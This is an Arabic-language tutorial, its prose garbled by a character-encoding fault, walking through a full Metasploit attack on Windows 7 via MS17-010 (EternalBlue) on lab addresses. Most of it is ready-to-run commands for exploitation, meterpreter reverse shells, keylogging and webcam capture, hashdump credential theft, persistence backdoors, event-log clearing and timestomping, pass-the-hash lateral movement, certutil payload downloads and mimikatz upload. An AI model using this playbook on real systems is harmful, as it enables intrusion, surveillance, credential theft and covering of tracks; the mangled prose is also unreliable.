๐ ุดุฑุญ ููุงุฆู ุดุงูู ููู ุดูุก ูู ุงุณุชุบูุงู ุซุบุฑุฉ SMB

๐ฏ ุงููุตู 1: ููู ุงูุซุบุฑุฉ ุชูุงูุงู

ูุง ูู MS17-010 (EternalBlue)ุ

```
ุฎูู ูู SMBv1 ูู Windows โ Buffer Overflow โ ุชูููุฐ ููุฏ ุนู ุจุนุฏ
```

ูุซู: ูุงูุฐุฉ ุงูุณูุงุฑุฉ ููุชูุญุฉ โ ุชูุฏ ูุฏู โ ุชูุชุญ ุงูุจุงุจ โ ุชุณุฑู ุงูุณูุงุฑุฉ

ููุงุฐุง Windows 7 ููุทุ

1. SMBv1 ููุนู ุชููุงุฆูุงู (Windows 10 ูุนุทูู)
2. ูุง ุชุญุฏูุซุงุช ุฃูููุฉ (ููุชูู ุงูุฏุนู 2020)
3. ุตูุงุญูุงุช ุถุนููุฉ (Admin ุจุฏูู ุจุงุณูุฑุฏ)

---

๐ง ุงููุตู 2: ุงูุฅุนุฏุงุฏ ุงูุฃููู

1. ุงูุชุญูู ูู ุงูุดุจูุฉ:

```bash
# ูู ูุงููุ ุงูุชุญ Terminal ูุงูุชุจ:
ifconfig
```

ูุฌุจ ูุธูุฑ: eth0: inet 192.168.146.128

```bash
# ุชุญูู ูู ุงูุงุชุตุงู ุจุงููุฏู
ping 192.168.146.133
```

ุฅุฐุง ุทูุน: 64 bytes from 192.168.146.133 โ ุงูุงุชุตุงู ุณููู

2. ูุญุต ุงูุซุบุฑุฉ:

```bash
# ุทุฑููุฉ 1: nmap
sudo nmap --script smb-vuln-ms17-010 -p 445 192.168.146.133

# ุทุฑููุฉ 2: ุฏุงุฎู msfconsole
msfconsole
use auxiliary/scanner/smb/smb_ms17_010
set RHOSTS 192.168.146.133
run
```

ุงููุชูุฌุฉ ุงููุชููุนุฉ:

```
[+] 192.168.146.133:445 - Host is likely VULNERABLE to MS17-010!
```

---

โ๏ธ ุงููุตู 3: ุงูุงุณุชุบูุงู ุงููุงูู

ุงูุทุฑููุฉ ุงููุถูููุฉ:

```bash
msfconsole

# 1. ุชุญููู exploit
use exploit/windows/smb/ms17_010_eternalblue

# 2. ุนุฑุถ ุงูุฎูุงุฑุงุช ุงููุทููุจุฉ
show options

# 3. ุชุนููู ุงููุฏู
set RHOSTS 192.168.146.133

# 4. ุชุนููู IP ูุงูู
set LHOST 192.168.146.128

# 5. ุงุฎุชูุงุฑ payload (ูุงู ุฌุฏุงู)
set PAYLOAD windows/x64/meterpreter/reverse_tcp

# 6. (ุงุฎุชูุงุฑู) ุชุบููุฑ ุงููููุฐ
set LPORT 5555

# 7. (ุงุฎุชูุงุฑู) ูุฒูุงุฏุฉ ูุฑุต ุงููุฌุงุญ
set AutoRunScript migrate -f
set ExitOnSession false

# 8. ุงูุชูููุฐ
exploit
```

ูุงุฐุง ูุญุฏุซ ุฎุทูุฉ ุจุฎุทูุฉ:

```
1. [-] = ุจุฏุฃ ุงูุงุชุตุงู
2. [*] = ุฅุฑุณุงู ุงูุญุฒู
3. [+] = ูุฌุงุญ ูุฑุญูุฉ
4. [*] Meterpreter session = ูุฌุงุญ ูุงูู
```

---

๐๏ธ ุงููุตู 4: ุฌููุน ุฃูุงูุฑ Meterpreter

4.1 ูุนูููุงุช ุงููุธุงู:

```bash
sysinfo          # Computer: WIN7-PC, OS: Windows 7
getuid           # Server username: NT AUTHORITY\SYSTEM (ุฅุฐุง ูุฌุญ getsystem)
getpid           # Current pid: 1234
ps               # ุนุฑุถ ุฌููุน ุงูุนูููุงุช
kill 1234        # ูุชู ุนูููุฉ ุจุฑูู PID
pkill explorer.exe  # ูุชู ุนูููุฉ ุจุงูุงุณู
```

4.2 ุงูุชุญูู ุจุงูุนูููุงุช:

```bash
# ุงูุงูุชูุงู ูุนูููุฉ ุฃุฎุฑู (ููู ููุงุณุชูุฑุงุฑ)
migrate 580      # ุงูุงูุชูุงู ูู services.exe (ูุณุชูุฑ)
migrate -N explorer.exe  # ุงูุงูุชูุงู ูู explorer.exe

# ุฅุฐุง ูู ุชุนุฑู PIDุ ุงุจุญุซ:
ps | grep -i explorer
# ุซู ุงูุณุฎ PID ูุงุณุชุฎุฏู migrate
```

4.3 ุงูุชููู ูู ุงููููุงุช:

```bash
pwd              # ุงุนุฑู ููุงูู ุงูุญุงูู
cd C:\\Users     # ุบูุฑ ุงููุฌูุฏ (ูุฌุจ \\)
ls               # ุนุฑุถ ุงููููุงุช
dir              # ููุณ ls
download "C:\\Windows\\System32\\config\\SAM" /tmp/  # ุชูุฒูู ููู
upload /home/kali/payload.exe "C:\\Windows\\Temp\\"  # ุฑูุน ููู
```

4.4 ุชูููุฐ ุงูุฃูุงูุฑ:

```bash
shell            # ุงูุชุญ cmd (ูุฏ ูุนูู)
# ุฅุฐุง ุนูู shellุ ุงุถุบุท Ctrl+Z ููุฎุฑูุฌ

# ุจุฏูู ุฃูุถู:
execute -f cmd.exe -i  # ููุชุญ cmd ุจุดูู ูุณุชูุฑ
# ุฃู
execute -H -f cmd.exe -c  # ูุฎูู ุงููุงูุฐุฉ
```

4.5 ุงูุชุฌุณุณ:

```bash
# ููุทุฉ ุดุงุดุฉ (ูุญุชุงุฌ SYSTEM)
screenshot
# ุณูุญูุธ ุงูุตูุฑุฉ ูู /home/kali/

# ุชุณุฌูู ุถุบุทุงุช
keyscan_start    # ุจุฏุก ุงูุชุณุฌูู
keyscan_dump     # ุนุฑุถ ุงููุณุฌู
keyscan_stop     # ุฅููุงู ุงูุชุณุฌูู

# ูุงููุฑุง
webcam_list      # ุนุฑุถ ุงููุงููุฑุงุช
webcam_snap 1    # ุงูุชูุงุท ุตูุฑุฉ
```

4.6 ุชุตุนูุฏ ุงูุตูุงุญูุงุช:

```bash
getsystem        # ุชุตุนูุฏ ูู SYSTEM (ุฃูู ุฃูุฑ)
# ุฅุฐุง ูุฌุญ: ...got system via technique 1
# ุฅุฐุง ูุดู: ุฌุฑุจ shell ุฃููุงู ุซู ุญุงูู ูุฏููุงู
```

4.7 ุณุฑูุฉ ุงููุนูููุงุช:

```bash
hashdump         # ุณุฑูุฉ ูููุงุช ุงููุฑูุฑ (ูุญุชุงุฌ SYSTEM)
# ุงููุชูุฌุฉ: Administrator:500:aad3b...:31d6c...:::

run post/windows/gather/enum_logged_on_users  # ุงููุณุชุฎุฏููู ุงููุชุตููู
run post/windows/gather/enum_applications     # ุงูุจุฑุงูุฌ ุงููุซุจุชุฉ
```

4.8 ุงูุซุจุงุชูุฉ:

```bash
# ุฅุถุงูุฉ ููุชุดุบูู ุงูุชููุงุฆู
run persistence -X -i 30 -p 4444 -r 192.168.146.128
# -X = ุงูุชุดุบูู ุนูุฏ Startup
# -i 30 = ุญุงูู ุงูุงุชุตุงู ูู 30 ุซุงููุฉ

# ุฃู ุนู ุทุฑูู registry
reg setval -k HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run -v Update -d "C:\\Windows\\Temp\\backdoor.exe"
```

4.9 ุงูุชูุธูู:

```bash
clearev          # ูุณุญ Event Logs
timestomp "C:\\malware.exe" -z "01/01/2020 12:00:00"  # ุชุบููุฑ ููุช ุงูููู
```

---

๐ ุงููุตู 5: ุงูุงูุชูุงู ูุฌูุงุฒ ุขุฎุฑ

ุงูุทุฑููุฉ 1: ุงุณุชุฎุฏุงู ููุณ ุงูู exploit

```bash
# ูู meterpreter
background       # ุงุฑุฌุน ูู msfconsole ูุน ุจูุงุก ุงูุฌูุณุฉ

# ุงูุขู ุฃูุช ูู msfconsole
# ุบูุฑ ุงููุฏู ููุท
set RHOSTS 192.168.146.134
exploit
```

ุงูุทุฑููุฉ 2: Pass-the-Hash (ุงูุฃูุถู)

```bash
# 1. ูู ุงูุฌูุณุฉ ุงูุฃูููุ ุณุฑู ุงูู hashes
meterpreter > hashdump
# ุงูุณุฎ ุงูู NT Hash (ุงูุฌุฒุก ุงูุซุงูู ุจุนุฏ :)

# 2. ุงุฑุฌุน ูู msfconsole
background

# 3. ุงุณุชุฎุฏู psexec ูุน ุงูู hash
use exploit/windows/smb/psexec
set RHOSTS 192.168.146.134
set SMBUser Administrator
set SMBPass aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0
# ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
# ูุฐุง ูู ุงูู hash ุงููุณุฑูู

set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.146.128
set LPORT 6666  # ุบูุฑ ุงููููุฐ ุนุดุงู ูุง ูุชุนุงุฑุถ
exploit
```

ุงูุทุฑููุฉ 3: WMI Exec

```bash
# ุฅุฐุง ูุงู ุงูู hash ูุง ุงุดุชุบู
use exploit/windows/smb/psexec
set RHOSTS 192.168.146.134
set SMBUser Administrator
set SMBPass Password123  # ุฌุฑุจ ูููุฉ ูุฑูุฑ ุจุณูุทุฉ
exploit
```

---

โ๏ธ ุงููุตู 6: ุญู ุงููุดุงูู ุงูุดุงุฆุนุฉ

ูุดููุฉ: "Exploit completed but no session"

ุงูุฃุณุจุงุจ:

1. Payload ุบูุฑ ููุงุณุจ โ ุฌุฑุจ windows/shell/reverse_tcp
2. ุงููุฏู ูุด vulnerable โ ุชุญูู ุจู check
3. ุฌุฏุงุฑ ุงูุญูุงูุฉ โ ุนุทูู ุฃู ุบูุฑ ุงููููุฐ

ุงูุญู:

```bash
set PAYLOAD windows/shell/reverse_tcp
set LPORT 80  # ุฃู 443 ุฃู 8080
set AutoRunScript migrate -f
exploit
```

ูุดููุฉ: "Handler failed to bind"

```bash
# IP ูุงูู ุฎุทุฃุ ุตุญุญู:
ifconfig
set LHOST [IP ุงูุตุญูุญ]
# ุฃู
set LHOST 0.0.0.0  # ูุณุชูุน ุนูู ูู ุงูู IPs
```

ูุดููุฉ: ุงูุฌูุณุฉ ุชููุทุน

```bash
# ุฏุงุฎู meterpreter
getpid           # ุงุนุฑู PID ุงูุญุงูู
migrate [PID ุฃูุจุฑ]  # ุงูุชูู ูุนูููุฉ ูุณุชูุฑุฉ
# PID ุฌูุฏ: 580 (services.exe) ุฃู 1234 (explorer.exe)
```

ูุดููุฉ: upload ูุดู

```bash
# 1. ุชุฃูุฏ ูู ุงูุตูุงุญูุงุช
getsystem

# 2. ุงุณุชุฎุฏู ุงููุณุงุฑ ุงูุตุญูุญ
upload /home/kali/file.exe C:\\Windows\\Temp\\file.exe

# 3. ุฌุฑุจ ุทุฑููุฉ ุจุฏููุฉ
shell
C:\> certutil -urlcache -f http://192.168.146.128/file.exe C:\Windows\Temp\file.exe
```

ูุดููุฉ: screenshot ูุง ูุนูู

```bash
# 1. ุงุตุนุฏ ุงูุตูุงุญูุงุช ุฃููุงู
getsystem

# 2. ูุฏ ูุง ูุฏุนู ุงููุธุงูุ ุฌุฑุจ:
screengrab
# ุฃู
run vnc
```

---

๐ฏ ุงููุตู 7: exploit ุงูููุงุณุจ ููู ุญุงูุฉ

1. Windows 7 64-bit (ุงูุฃูุซุฑ ุดููุนุงู):

```bash
use exploit/windows/smb/ms17_010_eternalblue
set PAYLOAD windows/x64/meterpreter/reverse_tcp
```

2. Windows 7 32-bit:

```bash
use exploit/windows/smb/ms17_010_eternalblue
set PAYLOAD windows/meterpreter/reverse_tcp
set TARGET 0  # Windows XP/2003
```

3. ุฅุฐุง ูุดู EternalBlue:

```bash
# ุฌุฑุจ psexec ูุน null session
use exploit/windows/smb/psexec
set RHOSTS 192.168.146.133
set SMBUser ''
set SMBPass ''
set PAYLOAD windows/shell/reverse_tcp
```

4. ุฅุฐุง ูุงู SMB Signing ููุนู:

```bash
# ุชุญุชุงุฌ Responder + NTLM Relay
# ููู ูุฐุง ูุชูุฏูุ ุฑูุฒ ุนูู ุงูุฃุณุงุณูุงุช ุฃููุงู
```

---

๐ ุงููุตู 8: ุฌุฏูู ุฃูุงูุฑ ูุฑุฌุนู

ุงูุฃูุฑ ุงููุตู ูุชู ูุณุชุฎุฏู
msfconsole ูุชุญ Metasploit ุงูุจุฏุงูุฉ
search eternalblue ุจุญุซ ุนู exploit ูุจู ุงููุฌูู
use exploit/... ุชุญููู exploit ุจุนุฏ ุงูุจุญุซ
show options ุนุฑุถ ุงูุฅุนุฏุงุฏุงุช ูุจู set
set RHOSTS [IP] ุชุนููู ุงููุฏู ูุจู exploit
set LHOST [IP] ุชุนููู IP ูุงูู ูุจู exploit
set PAYLOAD ... ุงุฎุชูุงุฑ payload ูุจู exploit
exploit ุชูููุฐ ุงููุฌูู ุจุนุฏ ุงูุฅุนุฏุงุฏ
sysinfo ูุนูููุงุช ุงููุธุงู ุจุนุฏ ุงูุงุฎุชุฑุงู
getuid ูุนุฑูุฉ ุงููุณุชุฎุฏู ุจุนุฏ ุงูุงุฎุชุฑุงู
getsystem ุชุตุนูุฏ ุงูุตูุงุญูุงุช ุฅุฐุง ููุช Admin
hashdump ุณุฑูุฉ ูููุงุช ุงููุฑูุฑ ุฅุฐุง ููุช SYSTEM
shell ูุชุญ cmd ููุชูููุฐ ุงููุจุงุดุฑ
upload ุฑูุน ููู ุฅุฐุง ููุช SYSTEM
download ุชูุฒูู ููู ุฅุฐุง ููุช SYSTEM
background ุงูุฑุฌูุน ูู msfconsole ููุงูุชูุงู ููุฏู ุขุฎุฑ
sessions ุนุฑุถ ุงูุฌูุณุงุช ูู msfconsole
sessions -i 1 ุงูุฏุฎูู ูุฌูุณุฉ ูู msfconsole

---

๐ ุงููุตู 9: ููู ุงูุตูุงุญูุงุช ูุงูุฃุฎุทุงุก

ููุงุฐุง getsystem ูููุ

```
ุจุฏูู SYSTEM:
- ูุง hashdump โ
- ูุง upload ูุจุนุถ ุงููุณุงุฑุงุช โ
- ูุง screenshot โ
- ูุญุฏูุฏ ุงูุตูุงุญูุงุช โ

ูุน SYSTEM:
- ูู ุดูุก ูููู โ
- ุชุญูู ูุงูู โ
- ุณุฑูุฉ ูู ุงููุนูููุงุช โ
```

ูููู ุงูู Hash ุงููุณุฑูู:

```
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
โโโโฌโโโ โโฌโ โโโโโโโโโโโโโโโฌโโโโโโโโโโโโโโ โโโโโโโโโโโโโโโฌโโโโโโโโโโโโโโ
  User   RID     LM Hash (ูุฏูู)           NT Hash (ูุงู)
```

ุงูู NT Hash ูู ุงูููู ููู Pass-the-Hash

---

๐ ุงููุตู 10: ุณููุงุฑูู ูุงูู ูู ุงูุฃูู ูููุงุก

ุงูููู ุงูุฃูู: ุงุฎุชุฑุงู Windows 7-1

```bash
# 1. ุงุจุฏุฃ
msfconsole

# 2. ุงุจุญุซ ูุงุณุชุฎุฏู
search eternalblue
use 0

# 3. ุนูู ุงูุฅุนุฏุงุฏุงุช
set RHOSTS 192.168.146.133
set LHOST 192.168.146.128
set PAYLOAD windows/x64/meterpreter/reverse_tcp

# 4. ูุงุฌู
exploit

# 5. ุฅุฐุง ูุฌุญ
meterpreter > sysinfo
meterpreter > getuid
meterpreter > getsystem
meterpreter > hashdump
meterpreter > screenshot
```

ุงูููู ุงูุซุงูู: ุงูุงูุชูุงู ูู Windows 7-2

```bash
# 1. ูู meterpreter
background

# 2. ุงุณุชุฎุฏู ููุณ ุงูู exploit ููุฌูุงุฒ ุงูุซุงูู
set RHOSTS 192.168.146.134
exploit

# 3. ุฃู ุจุงุณุชุฎุฏุงู ุงูู hash ุงููุณุฑูู
use exploit/windows/smb/psexec
set RHOSTS 192.168.146.134
set SMBUser Administrator
set SMBPass [ุงูู hash ูู ุงูููู ุงูุฃูู]
exploit
```

ุงูููู ุงูุซุงูุซ: ุงูุซุจุงุชูุฉ ูุงูุชุญูู

```bash
# 1. ุฃูุดุฆ backdoor
run persistence -X -i 30 -p 4444 -r 192.168.146.128

# 2. ุงุฑูุน ุฃุฏูุงุช
upload /home/kali/mimikatz.exe C:\\Windows\\Temp\\

# 3. ุณุฑู ูุนูููุงุช ุฃูุซุฑ
run post/windows/gather/enum_chrome
run post/windows/gather/enum_ie
```

---

๐ ุงููุตู 11: ูุตุงุฆุญ ููุงุฆูุฉ

ูุจู ุฃู ูุฌูู:

1. โ ุชุฃูุฏ ูู ุงูุนุฒู (ูู VMs ูู ููุณ ุงูุดุจูุฉ)
2. โ ุฎุฐ Snapshot (ุฅุฐุง ูุดูุช ุชุฑุฌุน)
3. โ ุฏูู ููุงุญุธุงุช (ูุง ุชุชุนููู)

ุฅุฐุง ูุดู exploit:

1. ุฌุฑุจ windows/shell/reverse_tcp ุจุฏู meterpreter
2. ุบูุฑ ุงููููุฐ (4444 โ 5555 โ 80 โ 443)
3. ุชุญูู ูู IPs ูุงุชุตุงู ุงูุดุจูุฉ
4. ุฌุฑุจ psexec ูุน ูููุงุช ูุฑูุฑ ุจุณูุทุฉ

ููููู ุงูุณุฑูุน:

1. SMBv1 = ุงูุจุงุจ ุงูููุชูุญ
2. EternalBlue = ุงูููุชุงุญ ุงูุณุฑู
3. Meterpreter = ูุฏู ุฏุงุฎู ุงููุธุงู
4. Hashdump = ููุชุงุญ ูู ุงูุฃุจูุงุจ
5. Pass-the-Hash = ูุชุญ ุฃุจูุงุจ ุฃุฎุฑู

---

๐ ุฅุฐุง ูุงุฌูุช ูุดููุฉ:

ุงุณุฃู ููุณู:

1. ูู ุงูู IPs ุตุญูุญุฉุ ifconfig + ipconfig
2. ูู ุงูุจูุฑุช 445 ููุชูุญุ nmap -p 445
3. ูู ุงููุธุงู vulnerableุ nmap --script smb-vuln-ms17-010
4. ูู ุงูู payload ููุงุณุจุ ุฌุฑุจ shell ุจุฏู meterpreter

ุงูุฃุฎุทุงุก ุงูุดุงุฆุนุฉ ูุญููููุง:

```bash
# ุฎุทุฃ: "No payload configured"
ุงูุญู: set PAYLOAD windows/x64/meterpreter/reverse_tcp

# ุฎุทุฃ: "Connection refused"
ุงูุญู: ping ุงููุฏูุ ุชุญูู ูู ุงูุดุจูุฉ

# ุฎุทุฃ: "Session died"
ุงูุญู: ุงุณุชุฎุฏู migrate ููุฑ ุงูุฏุฎูู

# ุฎุทุฃ: "Access denied"
ุงูุญู: getsystem ุฃููุงู
```

---

๐ ุงูุฎูุงุตุฉ ุงูููุงุฆูุฉ:

ุงูุฃูุงูุฑ ุงูุถุฑูุฑูุฉ ููุท:

```bash
# 1. ุงููุฌูู
msfconsole
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS 192.168.146.133
set LHOST 192.168.146.128
set PAYLOAD windows/x64/meterpreter/reverse_tcp
exploit

# 2. ุจุนุฏ ุงูุงุฎุชุฑุงู
getsystem
hashdump
background

# 3. ุงูุงูุชุดุงุฑ
set RHOSTS 192.168.146.134
exploit
```

ุงูุชุณูุณู ุงูููุทูู:

```
ุงูุชุญ msfconsole โ ุงุจุญุซ โ ุงุณุชุฎุฏู โ ุนูู โ ูุงุฌู โ ุงุตุนุฏ โ ุงุณุฑู โ ุงูุชุดุฑ
```

ุงูุขู ุฃูุช ุชุนุฑู ูู ุดูุก. ุงุจุฏุฃ ุจุงูุชุฌุฑุจุฉ ุงูุนูููุฉุ ูุงูุชุจ ูู ุฃู ุฎุทุฃ ุชูุงุฌูู ุจุงูุถุจุท!